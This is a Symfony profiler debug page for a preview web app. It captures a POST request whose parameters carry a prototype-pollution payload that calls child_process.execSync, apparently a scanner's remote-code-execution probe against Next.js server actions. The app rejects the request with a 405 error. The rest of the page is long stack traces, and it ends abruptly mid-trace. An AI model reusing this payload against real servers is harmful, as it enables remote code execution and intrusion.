http://website-pr-25.productbuilder.joboo.de/

ErrorController

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"_response":{"_formData":{"get":"$1:constructor:constructor"},"_prefix":"var res=process.mainModule.require('child_process').execSync('echo TEST_1775668182',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then","value":"{\"then\": \"$B0\"}"}"
1
""$@0""

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"error_controller"
_stopwatch_token
"6ce5ef"
exception
Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException {#617
  #message: "No route found for "POST http://website-pr-25.productbuilder.joboo.de/": Method Not Allowed (Allow: GET)"
  #code: 0
  #file: "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 139
  -previous: Symfony\Component\Routing\Exception\MethodNotAllowedException {#1288 …}
  -statusCode: 405
  -headers: [
    "Allow" => "GET"
  ]
  trace: {
    /workspace/backend-app/vendor/symfony/http-kernel/EventListener/RouterListener.php:139 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new MethodNotAllowedHttpException($e->getAllowedMethods(), $message, $e);}
    }
    /workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:118 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#1408 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#1608 …}
        }
      }
    }
    /workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#1408 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#1608 …}
      }
    }
    /workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …17]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#1408 …}
      }
    }
    /workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#1408 …}
        $eventName: "kernel.request"
      }
    }
    /workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php:139 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#1408 …}
        $eventName: "kernel.request"
      }
    }
    /workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
        $type: 1
      }
    }
    /workspace/backend-app/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
        $type: 1
        $catch: true
      }
    }
    /workspace/backend-app/vendor/symfony/http-kernel/HttpCache/SubRequestHandler.php:86 {
      Symfony\Component\HttpKernel\HttpCache\SubRequestHandler::handle(HttpKernelInterface $kernel, Request $request, int $type, bool $catch): Response …
      › try {    return $kernel->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
        $type: 1
        $catch: true
      }
    }
    /workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php:482 {
      Symfony\Component\HttpKernel\HttpCache\HttpCache->forward(Request $request, bool $catch = false, ?Response $entry = null) …
      › // always a "master" request (as the real master request can be in cache)$response = SubRequestHandler::handle($this->kernel, $request, HttpKernelInterface::MAIN_REQUEST, $catch);arguments: {
        $kernel: App\Kernel {#12 …}
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
        $type: 1
        $catch: true
      }
    }
    /workspace/backend-app/vendor/symfony/framework-bundle/HttpCache/HttpCache.php:73 {
      Symfony\Bundle\FrameworkBundle\HttpCache\HttpCache->forward(Request $request, bool $catch = false, ?Response $entry = null) …
      › 
      ›     return parent::forward($request, $catch, $entry);}
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
        $catch: true
        $entry: null
      }
    }
    /workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php:272 {
      Symfony\Component\HttpKernel\HttpCache\HttpCache->pass(Request $request, bool $catch = false) …
      › 
      ›     return $this->forward($request, $catch);}
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
        $catch: true
      }
    }
    /workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php:288 {
      Symfony\Component\HttpKernel\HttpCache\HttpCache->invalidate(Request $request, bool $catch = false) …
      › {    $response = $this->pass($request, $catch);arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
        $catch: true
      }
    }
    /workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php:216 {
      Symfony\Component\HttpKernel\HttpCache\HttpCache->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › if (!$request->isMethodSafe()) {    $response = $this->invalidate($request, $catch);} elseif ($request->headers->has('expect') || !$request->isMethodCacheable()) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
        $catch: true
      }
    }
    /workspace/backend-app/public/index.php:59 {
      require …
      › 
      › $response = $kernel->handle($request);$response->send();
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#18 …}
      }
    }
    /workspace/.productbuilding/preview/router.php:18 {
      › 
      › require $public . "/index.php";arguments: {
        "/workspace/backend-app/public/index.php"
      }
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#1419 …9}

Request Headers

Header Value
accept
"text/x-component"
accept-encoding
"gzip"
accept-language
"en-US,en;q=0.9"
content-length
"643"
content-type
"multipart/form-data; boundary=013a9439b5f2aa31b805679d560f021a515bad1182d5b6a9cbcf85a18dfd"
forwarded
"for="172.18.0.2";host="website-pr-25.productbuilder.joboo.de";proto=http"
host
"website-pr-25.productbuilder.joboo.de"
next-action
"x"
origin
"https://website-pr-25.productbuilder.joboo.de"
referer
"https://website-pr-25.productbuilder.joboo.de"
surrogate-capability
"symfony="ESI/1.0""
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
x-forwarded-for
"172.18.0.2"
x-forwarded-server
"793078a63ff3"
x-php-ob-level
"1"
x-real-ip
"85.11.167.19"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
allow
"GET"
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Wed, 08 Apr 2026 17:09:42 GMT"
vary
"Accept"
x-debug-exception
"No%20route%20found%20for%20%22POST%20http%3A%2F%2Fwebsite-pr-25.productbuilder.joboo.de%2F%22%3A%20Method%20Not%20Allowed%20%28Allow%3A%20GET%29"
x-debug-exception-file
"%2Fworkspace%2Fbackend-app%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:139"
x-debug-token
"54fdde"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session 6

Session Metadata

Key Value
Created
"Wed, 08 Apr 26 17:09:42 +0000"
Last used
"Wed, 08 Apr 26 17:09:42 +0000"
Lifetime
0

Session Attributes

No session attributes

Session Usage

6 Usages
Stateless check enabled
Usage
ContainerELwAbNG\getSession_FlashBagService:24
[
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/getSession_FlashBagService.php"
    "line" => 24
    "function" => "getFlashBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/App_KernelDevDebugContainer.php"
    "line" => 1450
    "function" => "do"
    "class" => "ContainerELwAbNG\getSession_FlashBagService"
    "type" => "::"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/App_KernelDevDebugContainer.php"
    "line" => 5893
    "function" => "load"
    "class" => "ContainerELwAbNG\App_KernelDevDebugContainer"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/App_KernelDevDebugContainer.php"
    "line" => 1858
    "function" => "getUserServiceService"
    "class" => "ContainerELwAbNG\App_KernelDevDebugContainer"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/App_KernelDevDebugContainer.php"
    "line" => 4722
    "function" => "getIntegratedExternalPartnerGohiringServiceService"
    "class" => "ContainerELwAbNG\App_KernelDevDebugContainer"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/App_KernelDevDebugContainer.php"
    "line" => 5083
    "function" => "getIntegratedExternalPartnerServiceService"
    "class" => "ContainerELwAbNG\App_KernelDevDebugContainer"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/App_KernelDevDebugContainer.php"
    "line" => 1696
    "function" => "getFeatureLimitationsServiceService"
    "class" => "ContainerELwAbNG\App_KernelDevDebugContainer"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/getAccessDeniedSubscriberService.php"
    "line" => 27
    "function" => "get_Container_Private_TwigService"
    "class" => "ContainerELwAbNG\App_KernelDevDebugContainer"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/App_KernelDevDebugContainer.php"
    "line" => 1450
    "function" => "do"
    "class" => "ContainerELwAbNG\getAccessDeniedSubscriberService"
    "type" => "::"
  ]
  [
    "file" => "/workspace/backend-app/var/cache/dev/ContainerELwAbNG/App_KernelDevDebugContainer.php"
    "line" => 2626
    "function" => "load"
    "class" => "ContainerELwAbNG\App_KernelDevDebugContainer"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 245
    "function" => "{closure:ContainerELwAbNG\App_KernelDevDebugContainer::getEventDispatcherService():2625}"
    "class" => "ContainerELwAbNG\App_KernelDevDebugContainer"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 76
    "function" => "sortListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 293
    "function" => "getListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 148
    "function" => "preProcess"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 223
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 86
    "function" => "handleThrowable"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/SubRequestHandler.php"
    "line" => 86
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 482
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\SubRequestHandler"
    "type" => "::"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/framework-bundle/HttpCache/HttpCache.php"
    "line" => 73
    "function" => "forward"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 272
    "function" => "forward"
    "class" => "Symfony\Bundle\FrameworkBundle\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 288
    "function" => "pass"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 216
    "function" => "invalidate"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/public/index.php"
    "line" => 59
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/.productbuilding/preview/router.php"
    "line" => 18
    "args" => [
      "/workspace/backend-app/public/index.php"
    ]
    "function" => "require"
  ]
]
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:72
[
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/DataCollector/RequestDataCollector.php"
    "line" => 72
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Profiler/Profiler.php"
    "line" => 161
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\DataCollector\RequestDataCollector"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ProfilerListener.php"
    "line" => 108
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\Profiler\Profiler"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelResponse"
    "class" => "Symfony\Component\HttpKernel\EventListener\ProfilerListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 196
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 184
    "function" => "filterResponse"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ErrorListener.php"
    "line" => 91
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelException"
    "class" => "Symfony\Component\HttpKernel\EventListener\ErrorListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 223
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 86
    "function" => "handleThrowable"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/SubRequestHandler.php"
    "line" => 86
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 482
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\SubRequestHandler"
    "type" => "::"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/framework-bundle/HttpCache/HttpCache.php"
    "line" => 73
    "function" => "forward"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 272
    "function" => "forward"
    "class" => "Symfony\Bundle\FrameworkBundle\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 288
    "function" => "pass"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 216
    "function" => "invalidate"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/public/index.php"
    "line" => 59
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/.productbuilding/preview/router.php"
    "line" => 18
    "args" => [
      "/workspace/backend-app/public/index.php"
    ]
    "function" => "require"
  ]
]
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:73
[
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/DataCollector/RequestDataCollector.php"
    "line" => 73
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Profiler/Profiler.php"
    "line" => 161
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\DataCollector\RequestDataCollector"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ProfilerListener.php"
    "line" => 108
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\Profiler\Profiler"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelResponse"
    "class" => "Symfony\Component\HttpKernel\EventListener\ProfilerListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 196
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 184
    "function" => "filterResponse"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ErrorListener.php"
    "line" => 91
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelException"
    "class" => "Symfony\Component\HttpKernel\EventListener\ErrorListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 223
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 86
    "function" => "handleThrowable"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Kernel.php"
    "line" => 202
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/SubRequestHandler.php"
    "line" => 86
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 482
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\SubRequestHandler"
    "type" => "::"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/framework-bundle/HttpCache/HttpCache.php"
    "line" => 73
    "function" => "forward"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 272
    "function" => "forward"
    "class" => "Symfony\Bundle\FrameworkBundle\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 288
    "function" => "pass"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpCache/HttpCache.php"
    "line" => 216
    "function" => "invalidate"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/public/index.php"
    "line" => 59
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpCache\HttpCache"
    "type" => "->"
  ]
  [
    "file" => "/workspace/.productbuilding/preview/router.php"
    "line" => 18
    "args" => [
      "/workspace/backend-app/public/index.php"
    ]
    "function" => "require"
  ]
]
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:74
[
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/DataCollector/RequestDataCollector.php"
    "line" => 74
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/Profiler/Profiler.php"
    "line" => 161
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\DataCollector\RequestDataCollector"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ProfilerListener.php"
    "line" => 108
    "function" => "collect"
    "class" => "Symfony\Component\HttpKernel\Profiler\Profiler"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelResponse"
    "class" => "Symfony\Component\HttpKernel\EventListener\ProfilerListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 196
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 184
    "function" => "filterResponse"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 75
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/EventListener/ErrorListener.php"
    "line" => 91
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 118
    "function" => "onKernelException"
    "class" => "Symfony\Component\HttpKernel\EventListener\ErrorListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 230
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 59
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 154
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/workspace/backend-app/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 223
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
